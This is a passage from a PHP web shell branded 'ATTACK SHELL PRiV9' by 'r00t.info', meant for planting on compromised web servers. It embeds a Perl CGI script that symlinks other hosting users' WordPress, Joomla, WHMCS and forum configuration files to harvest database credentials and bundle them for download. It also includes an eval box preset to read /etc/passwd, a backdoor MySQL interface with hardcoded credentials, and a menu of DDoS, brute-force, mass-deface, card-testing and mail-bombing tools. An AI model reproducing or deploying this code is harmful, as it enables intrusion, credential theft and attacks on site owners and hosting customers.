105RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
106jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
1076f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; $configshell = '#!/usr/bin/perl -I/usr/local/bandmin
108print "Content-type: text/html\n\n";
109print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hxxp://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
110<html xmlns="hxxp://www.w3.org/1999/xhtml">
111
112<head>
113<meta hxxp-equiv="Content-Language" content="en-us" />
114<meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8" />
115<title>Priv8 SCR</title>
116<style type="text/css">
117.newStyle1 {
118 font-family: tahoma, verdana, Arial;
119 font-size: medium;
120 color: #FFFFFF;
121 background-color: #666666;
122 text-align: center;
123}
124</style>
125</head>
126';
127sub lil{
128 ($user) = @_;
129$msr = qx{pwd};
130$kola=$msr."/".$user;
131$kola=~s/\n//g;
132symlink('/home/'.$user.'/public_html/beta/configuration.php',$kola.'-joomla.txt') ;
133 symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt') ;
134 symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla - home.txt') ;
135 symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wordpress.txt') ;
136 symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wordpress.txt') ;
137 symlink('/home/'.$user.'/public_html/web/wp-config.php',$kola.'-wordpress - web.txt') ;
138 symlink('/home/'.$user.'/public_html/SSI.php',$kola.'- C M F .txt') ;
139 symlink('/home/'.$user.'/public_html/forum/SSI.php',$kola.'- C M F - forum.txt') ;
140 symlink('/home/'.$user.'/public_html/inc/config.php',$kola.'- MyBB.txt') ;
141 symlink('/home/'.$user.'/public_html/forum/inc/config.php',$kola.'- MyBB - forum.txt') ;
142 symlink('/home/'.$user.'/public_html/config.php',$kola.'- Other.txt') ;
143 symlink('/home/'.$user.'/public_html/lib/config.php',$kola.'- Balitbang.txt') ;
144 symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-clients.txt') ;
145 symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-client.txt') ;
146 symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt') ;
147 symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ;
148 symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'- whmcs - whmcs.txt') ;
149 symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'- whm - whm.txt');
150 symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'- VBulletin - forum.txt');
151 symlink('/home/'.$user.'/public_html/forum/config.php',$kola.' - PhpBB - forum.txt') ;
152 symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'- whmc - whmc.txt');
153 symlink('/home/'.$user.'/public_html/submitticket.php',$kola.' - whmcs2.txt');
154 symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.' -mangewhmcs.txt');
155 symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.' -myshop.txt');
156 symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
157 symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
158 symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
159 symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
160 symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
161 symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
162 symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
163 symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
164 symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'- wordpress - wp.txt');
165 symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'- wwordpress - wp - beta.txt');
166 symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'- wordpress - beta.txt');
167 symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
168 symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'- wordpress -wordpress.txt');
169 symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'- wordpress - wordpress-beta.txt');
170 symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'- wordpress -news.txt');
171 symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'- wordpress - new.txt');
172 symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'- wordpress - blogs.txt');
173 symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'- wordpress - home.txt');
174 symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'- wordpress - protal.txt');
175 symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'- wordpress - site.txt');
176 symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'- wordpress - main.txt');
177 symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'- wordpress - test.txt');
178 symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla - joomla .txt');
179 symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'- joomla - protal.txt');
180 symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'- joomla - joo.txt');
181 symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'- joomla - cms.txt');
182 symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'- joomla - site.txt');
183 symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'- joomla - main.txt');
184 symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'- joomla - news.txt');
185 symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'- joomla - new.txt');
186 symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'- joomla - home.txt');
187 symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'- vb.txt');
188 symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'- vb3.txt');
189 symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'-cpanel.txt');
190 symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');
191 symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'-host.txt');
192 symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');
193 symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'-hosts.txt');
194 symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'-zencart.txt');
195 symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'- zencart - shop.txt');
196 symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'-shop-ZCshop.txt');
197 symlink('/home/'.$user.'/public_html/Settings.php',$kola.'- smf.txt');
198 symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'- smf - smf.txt');
199 symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'- smf - forum.txt');
200 symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'- smf - forums.txt');
201 symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'- upload .txt');
202 symlink('/home/'.$user.'/public_html/incl/config.php',$kola.'- malay.txt');
203 symlink('/home/'.$user.'/public_html/config/koneksi.php',$kola.'- lokomedia.txt');
204 symlink('/home/'.$user.'/system/sistem.php',$kola.'- lokomedia.txt');
205 }
206if ($ENV{'REQUEST_METHOD'} eq 'POST') {
207 read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
208} else {
209 $buffer = $ENV{'QUERY_STRING'};
210}
211@pairs = split(/&/, $buffer);
212foreach $pair (@pairs) {
213 ($name, $value) = split(/=/, $pair);
214 $name =~ tr/+/ /;
215 $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
216 $value =~ tr/+/ /;
217 $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
218 $FORM{$name} = $value;
219}
220if ($FORM{pass} eq ""){
221print '
222<body class="newStyle1">
223<p> </p>
224<form method="post">
225<textarea name="pass" style="width: 543px; height: 400px"></textarea>
226<br /><br />
227<input name="tar" type="text" style="width: 212px" /><br /><br />
228<input name="Submit1" type="submit" value="Hajar ..!" style="width: 99px" />
229<br />
230</form>';
231}else{
232@lines =<$FORM{pass}>;
233$y = @lines;
234open (MYFILE, ">tar.tmp");
235print MYFILE "tar -czf ".$FORM{tar}.".tar ";
236for ($ka=0;$ka<$y;$ka++){
237while(@lines[$ka] =~ m/(.*?):x:/g){
238&lil($1);
239print MYFILE $1.".txt ";
240for($kd=1;$kd<18;$kd++){
241print MYFILE $1.$kd.".txt ";
242}
243}
244 }
245print'<body class="newStyle1">
246<p>Done !!</p>
247<p> </p>';
248if($FORM{tar} ne ""){
249open(INFO, "tar.tmp");
250@lines =<INFO> ;
251close(INFO);
252system(@lines);
253print'<p><a href="'.$FORM{tar}.'.tar"> download file</a></p>';
254}
255}
256 print"
257</body>
258</html>";'; ?>
259<html><head><link href='hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg' rel='icon' type='image/gif'><script language='JavaScript'>
260var txt="ATTACK SHELL PRiV9 ";
261var kecepatan=120;var segarkan=null;function bergerak() { document.title=txt;
262txt=txt.substring(1,txt.length)+txt.charAt(0);
263segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
264</script>
265<link href='hxxp://fonts.googleapis.com/css?family=Roboto:400,300,400italic,500,700%7CRopa+Sans%7COswald' rel='stylesheet' type='text/css'/>
266<script type="text/javascript">
267function tukar(lama,baru){
268 document.getElementById(lama).style.display = 'none';
269 document.getElementById(baru).style.display = 'block';
270}
271</script>
272<style type="text/css">
273body{
274 background:#000000;;
275}
276a {
277text-decoration:none;
278}
279a:hover{
280border-bottom:1px solid #FF0000;
281}
282*{
283 font-size:11px;
284 font-family:Tahoma,Verdana,Arial;
285 color:#FFFFFF;
286}
287#menu{
288 background:none;
289 margin:8px 2px 4px 2px;
290}
291.menu a{
292background-color:#CCFF00;
293 display:inline-block;
294 position:relative;
295 margin:30px 5px;
296 border:1px solid #FFFFFF;
297 padding:20px 20px 20px 80px;
298 color:#fff;
299 transition:all 0.4s ease
300}
301
302.menu a:hover{
303 background:#2c3e50
304}
305.tabnet{
306 margin:15px auto 0 auto;
307 border: 1px solid #CCCC00;
308}
309.main {
310 width:100%;
311 box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
312}
313.gaya {
314 color: #FF0000;
315}
316.inputz{
317 background:#000000;
318 border:0;
319 padding:2px;
320 border-bottom:1px solid #FFFFFF;
321 border-top:1px solid #FFFFFF;
322}
323.inputzbut{
324 background:#000000;
325 color:#FFFFFF;
326 margin:0 4px;
327 border:2px solid #000000;
328
329}
330.inputz:hover,{
331 border-bottom:1px solid #FF0000;
332 border-top:1px solid #FF0000;
333}
334.inputzbut:hover{
335border:2px solid #FFFFFF;
336}
337.output {
338 margin:auto;
339 border:1px solid #FF0000;
340 width:100%;
341 height:400px;
342 background:#000000;
343 padding:0 2px;
344}
345.cmdbox{
346 width:100%;
347}
348.head_info{
349 padding: 0 4px;
350}
351.jaya{ font-family: ;}
352
353.coli{
354 font-size:30px;
355 padding:0;
356 color:#000000;
357}
358.coli_tbl{
359 text-align:center;
360 margin:0 4px 0 0;
361 padding:0 4px 0 0;
362 border-right:2px solid #FFFFFF;
363}
364.phpinfo table{
365 width:100%;
366 padding:0 0 0 0;
367}
368.phpinfo td{
369 background:#000000;
370 color:#000000;
371padding:6px 8px;;
372}
373.phpinfo th, th{
374 background:#000000;
375 border-bottom:1px solid #CCCC00;
376font-weight:normal;
377}
378.phpinfo h2, .phpinfo h2 a{
379 text-align:center;
380 font-size:16px;
381 padding:0;
382 margin:30px 0 0 0;
383 background:#CCCC00;
384 padding:4px 0;
385}
386.explore{
387width:100%;
388}
389.explore a {
390text-decoration:none;
391}
392.explore td{
393border-bottom:2px solid #FFFFFF;
394padding:0 8px;
395line-height:24px;
396}
397.explore th{
398padding:3px 8px;
399font-weight:normal;
400background:#000000;
401border-bottom:2px solid #FFFFFF;
402}
403.explore th:hover , .phpinfo th:hover{
404border-bottom:1px solid #FF0000;
405}
406.explore tr:hover{
407background:#000000;
408}
409.viewfile{
410background:#000000;
411color:#000000;
412margin:4px 2px;
413padding:8px;
414}
415.sembunyi{
416display:none;
417padding:0;margin:0;
418}
419.btn {
420background:#000000;
421width:auto;
422height:auto;
423padding:5px;
424border:2px #FFFFFF solid;
425font-family:"oswald";
426font-size:14px;
427color:#FFFFFF;
428text-align:center;
429text-decoration:none;
430text-transform:uppercase;
431}
432.btn:hover {
433background:#FFFFFF;
434width:auto;
435height:auto;
436padding:5px;
437margin:0px;
438border:2px #000000 solid;
439font-family:"oswald";
440font-size:14px;
441color:#000000;
442text-align:center;
443text-decoration:none;
444text-transform:uppercase;
445}
446body {
447background:#FFFFFF;
448background:url("hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg");
449}
450.header {
451background:#000000;
452width:100%;
453height:auto;
454poisition:static;top:0px;
455font-family:"Oswald";
456font-size:16px;
457color:#FFFFFF;
458border-bottom:2px solid #FFFFFF;
459padding-bottom:20px;
460box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
461}
462/* Vn Navigasi
463-------------------------*/
464.vn-nav{
465 background:#000000;
466 width:auto;
467 padding-top:15px;
468 padding-bottom:15px;
469 font-size:14px;
470 padding-left:20px;
471 border-bottom: #000000 3px solid;
472}
473
474.vn-nav ul { margin: 0; padding: 0; list-style-type: none; list-style-image: none; }
475
476.vn-nav li { margin-right: 0px; display: inline; }
477
478.vn-nav ul li a { text-decoration:none; margin: 0px; padding: 15px 20px 15px 20px; color:#ffffff; }
479
480.vn-nav li.current-menu-item a{ color: #fff; text-decoration:none; background-color:#000000; }
481
482.vn-nav li.current_page_item { color: #fff; text-decoration:none; background-color:#000000; }
483
484/* Vn Simple Modal
485-------------------------*/
486.modalDialog {
487 position: fixed;
488 font-family: Arial, Helvetica, sans-serif;
489 top: 0;
490 right: 0;
491 bottom: 0;
492 left: 0;
493 background: rgba(0,0,0,0.8);
494 z-index: 99999;
495 opacity:0;
496 -webkit-transition: opacity 400ms ease-in;
497 -moz-transition: opacity 400ms ease-in;
498 transition: opacity 400ms ease-in;
499 pointer-events: none;
500}
501
502.modalDialog:target {
503 opacity:1;
504 pointer-events: auto;
505}
506
507.modalDialog > div {
508 width: 500px;height:auto;
509 position: relative;
510 margin: 5% auto;
511 padding: 5px 20px 13px 20px;
512 background: #34495e;color:#fff;
513}
514
515.close {
516 background: #2c3e50;
517 color: #000000;padding:5px;border-radius:0 0 12px 0;
518 line-height: 16px;
519 position: absolute;
520 right: -55px;
521 text-align: center;
522 top: 0;
523 width: 16px;
524 text-decoration: none;
525 font-weight: bold;
526}
527
528.close:hover { background: #2c3e50;color:#e74c3c }
529
530/* Vn Button
531-------------------------*/
532
533.vn-green a{
534background-color:#CCFF00;
535 display:inline-block;
536 position:relative;
537 margin:30px 5px;
538 border:1px solid #FFFFFF;
539 padding:20px 20px 20px 80px;
540 color:#fff;
541 transition:all 0.4s ease
542}
543
544.vn-green a:hover{
545 background:#2c3e50
546}
547.content{
548background:#2E2A2A;
549width:100%;
550height:auto;
551padding-bottom:10px;
552box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
553}
554.footer{
555background:#000000;
556width:100%;
557height:auto;
558position:static;bottom:0px;
559padding-top:15px;
560padding-bottom:15px;
561font-family:"Oswald";
562font-size:10px;
563color:#FFFFFF;
564text-align:center;
565text-transform:uppercase;
566box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
567}
568.footer:a link{
569font-family:"Oswald";
570}
571.cr {
572background:none;
573float:right;
574padding-right:15px;
575padding-top:20px;
576font-family:"Oswald";
577font-size:24px;
578color:#FFFFFF;
579text-transform:uppercase;
580}
581.cr:hover {
582background:none;
583float:right;
584padding-right:15px;
585padding-top:20px;
586font-family:"Oswald";
587font-size:24px;
588color:#000000;
589text-transform:uppercase;
590}
591.menu-wrap{
592background:#000000;
593width:100%;
594height:auto;
595padding-bottom:10px;
596box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
597}
598</style>
599</head>
600
601
602<body onLoad="document.getElementById('cmd').focus();">
603<div class="main">
604<div class="vn-nav">
605<ul>
606 <li><a href="#openModal">About</a>
607
608<div id="openModal" class="modalDialog">
609 <div>
610 <a href="#close" title="Close" class="close">X</a>
611 <center><p><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="350px" height="290px"/><br/>egyshell team are a Network Security and YouTube Vloger.<br/><br/>hacking is the art of creative problem resolving<br/></p>
612<div class="vn-green" style="text-align: center;"><a href="hxxps://www.facebook.com/r00t.info/" target="_blank">r00t.info</a> | <a href="hxxp://r00t.info" target="_blank">site</a> | <a href="hxxps://www.facebook.com/r00t.info/" target="_blank">Attack shell priv8</a></div></center>
613</div>
614</div></li>
615</ul>
616<div class="cr">lacked by r00t.info</div>
617</div>
618<div class="header">
619<div class="head_info">
620<table ><tr>
621<td><table class="coli_tbl"><tr><td><a href="?"><span class="coli"><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="225" heigth="155" /></span></a></td></tr><tr><td><b></b></td></tr></table></td>
622<td><?php echo $buff; ?></td>
623</tr></table>
624</div>
625</div>
626<div class="menu-wrap">
627<div class="vn-nav">Menu</div><br/>
628<!-- menu start -->
629<center><div id="menu">
630<a class="btn" href="?<?php echo "y=".$pwd; ?>">Home</a>
631<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a>
632<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a>
633<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=sql">Mysql</a>
634<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=dump">Database Dump</a>
635<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=phpinfo">Php Info</a>
636<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=netsploit">Net Sploit</a>
637<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a>
638<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mail">E-Mail</a>
639<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=sqli-scanner">SQLI Scan</a>
640<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=port-sc">Port Scan</a>
641<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=dos">DDos</a>
642<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=tool">Tools</a>
643<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=domain">Domain</a>
644<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=python">python</a>
645<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=symlink">Symlink</a>
646<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=config">Config</a>
647<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bypass">Bypass</a><br/><br/>
648<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=cgi">CgiShell</a>
649<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=cgi2012">CGI Telnet 2012</a>
650<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jodexer">Joomla IndChange</a>
651<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=vb">VB IndChange</a>
652<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=wp-reset">Wordpress ResPass</a>
653<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jm-reset">Joomla ResPass</a>
654<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmcs">WHMCS Decoder</a>
655<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=zone">Zone-H</a>
656<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mass">Mass Deface</a>
657<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=wpbrute">Wordpress BruteForce</a><br/><br/>
658<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jbrute">Joomla BruteForce</a>
659<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=brute">Cpanel BruteForce</a>
660<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bypass-cf">Bypass CloudFlare</a>
661<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=adfin">Admin Finder</a>
662<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=hash">Password Hash</a>
663<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=hashid">Hash ID</a>
664<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=string">Script Encode</a>
665<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ccv">CC Tester</a>
666<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whois">Website Whois</a>
667<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=music">Musicfiles</a><br/><br/>
668<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jss">Joomla Server Scanner</a>
669<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=cms_detect">Cms Detector</a>
670<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=color">Color Tools</a>
671<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=telin">Speedtest</a>
672<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=idfinder">Facebook ID Finder</a>
673<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=schoolhos">Schoolhos</a>
674<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmcr">WHM Cracker</a>
675<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=rd">Root Devil Scanner</a>
676<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=dork">Dork List</a><br/><br/>
677<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ppcheck">Paypal Checker</a>
678<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=jce">JCE Exploiter</a>
679<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=comuser">Com_user Scanner</a>
680<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=configkiller">Config File Killer</a>
681<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=spoison">Silent Poison</a>
682<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mailbomb">Bomb Mailer</a>
683<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmcsploit">WHMCS Exloiter</a>
684<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ascii">ASCII Encoder</a><br/><br/>
685<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=apache">Apache</a>
686<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=hostgator">Hostgator</a>
687<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bluehost">Bluehost</a>
688<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=litespeed">Litespeed</a>
689<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=ovh">OVH</a>
690<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=forbidden">Forbidden</a>
691<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=phpnuke">PHP Nuke</a>
692<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=whmtool">WHMCS Tools</a>
693<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=unzip">Unzip</a>
694<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=systemview">View System</a>
695<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=traintup">Traintup</a><br/><br/>
696<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=mysqlback">Mysql Backup</a>
697<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=bind">Bindconnect</a>
698<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=security">Security</a>
699<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=shellscan">Shell Scanner</a>
700<a class="btn" href="?<?php echo $self.'gdork'?>">Dork Creator</a>
701<a class="btn" href="<?php echo $self.'?obfuscate'?>">Obfuscator</a>
702<a class="btn" href="?<?php echo "y=".$pwd; ?>&x=logout">Log-Out</a><br/><br/>
703
704
705</div></center>
706<!-- menu end -->
707</div>
708<div class="content">
709<div class="vn-nav">Explore Like a Boss</div>
710<?php @ini_set('display_errors', 0); if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
711<form action="?y=<?php echo $pwd; ?>&x=php" method="post">
712<table class="cmdbox">
713<tr><td>
714<textarea class="output" name="cmd" id="cmd">
715<?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?>
716</textarea>
717<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
718</table>
719</form>
720
721<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')) { ?>
722<form action="?y=<?php echo $pwd; ?>&x=sql" method="post">
723<?php echo "<center/><br/><b><font color=#FF0000>+--==[ Mysql Interface ]==--+</font></b><br><br>"; mkdir('mysql', 0755); chdir('mysql'); $akses = ".htaccess"; $buka_lah = "$akses"; $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
724AddType application/x-hxxpd-php .cpc
725"; fwrite ( $buka , $metin ) ; fclose ($buka); $sqlshell = '<?
726$PASSWORD = "root_xhahax";
727$USERNAME = "xhahax";
728if ( function_exists('ini_get') ) {
729 $onoff = ini_get('register_globals');
730} else {
731 $onoff = get_cfg_var('register_globals');
732}
733if ($onoff != 1) {
734 @extract($hxxp_SERVER_VARS, EXTR_SKIP);
735 @extract($hxxp_COOKIE_VARS, EXTR_SKIP);
736 @extract($hxxp_POST_FILES, EXTR_SKIP);
737 @extract($hxxp_POST_VARS, EXTR_SKIP);
738 @extract($hxxp_GET_VARS, EXTR_SKIP);
739 @extract($hxxp_ENV_VARS, EXTR_SKIP);
740}
741
742function logon() {
743 global $PHP_SELF;
744 setcookie( "mysql_web_admin_username" );
745 setcookie( "mysql_web_admin_password" );
746 setcookie( "mysql_web_admin_hostname" );
747 echo "<table width=100% height=100%><tr><td><center>\n";
748 echo "<table cellpadding=2><tr><td><center>\n";
749 echo "<table cellpadding=20><tr><td><center>\n";
750 echo "<h1>MySQL Interface By S4MP4H</h1>\n";
751 echo "<form action='$PHP_SELF'>\n";
752 echo "<input type=hidden name=action value=bG9nb25fc3VibWl0>\n";
753 echo "<table cellpadding=5 cellspacing=1>\n";
754 echo "<tr><td class=\"new\">Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
755 echo "<tr><td class=\"new\">Username </td><td> <input type=text name=username></td></tr>\n";
756 echo "<tr><td class=\"new\">Password </td><td> <input type=password name=password></td></tr>\n";
757 echo "</table><p>\n";
758 echo "<input type=submit value='Enter'>\n";
759 echo "<input type=reset value='Clear'><br>\n";
760 echo "</form>\n";
761 echo "</center></td></tr></table>\n";
762 echo "</center></td></tr></table>\n";
763 echo "<p><hr width=300>\n";
764 echo "</center></td></tr></table>\n";
765}
766
767function logon_submit() {
768 global $username, $password, $hostname ,$PHP_SELF;
769 if($hostname =='')
770 $hostname = 'localhost';
771 setcookie( "mysql_web_admin_username", $username );
772 setcookie( "mysql_web_admin_password", $password );
773 setcookie( "mysql_web_admin_hostname", $hostname );
774 echo "<META hxxp-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=bGlzdERCcw=='>";
775}
776
777function echoQueryResult() {
778 global $queryStr, $errMsg;
779 if( $errMsg == "" ) $errMsg = "Success";
780 if( $queryStr != "" ) {
781 echo "<table cellpadding=5>\n";
782 echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
783 echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
784 echo "</table><p>\n";
785 }
786}
787
788function listDatabases() {
789 global $mysqlHandle, $PHP_SELF;
790 echo "<h1>Databases List</h1>\n";
791 echo "<form action='$PHP_SELF'>\n";
792 echo "<input type=hidden name=action value=createDB>\n";
793 echo "<input type=text name=dbname>\n";
794 echo "<input type=submit value='Create Database'>\n";
795 echo "</form>\n";
796 echo "<hr>\n";
797 echo "<table cellspacing=1 cellpadding=5>\n";
798 $pDB = mysql_list_dbs( $mysqlHandle );
799 $num = mysql_num_rows( $pDB );
800 for( $i = 0; $i < $num; $i++ ) {
801 $dbname = mysql_dbname( $pDB, $i );
802 echo "<tr>\n";
803 echo "<td>$dbname</td>\n";
804 echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
805 echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
806 echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
807 echo "</tr>\n";
808 }
809 echo "</table>\n";
810}
811
812function createDatabase() {
813 global $mysqlHandle, $dbname, $PHP_SELF;
814 mysql_create_db( $dbname, $mysqlHandle );
815 listDatabases();
816}
817
818function dropDatabase() {
819 global $mysqlHandle, $dbname, $PHP_SELF;
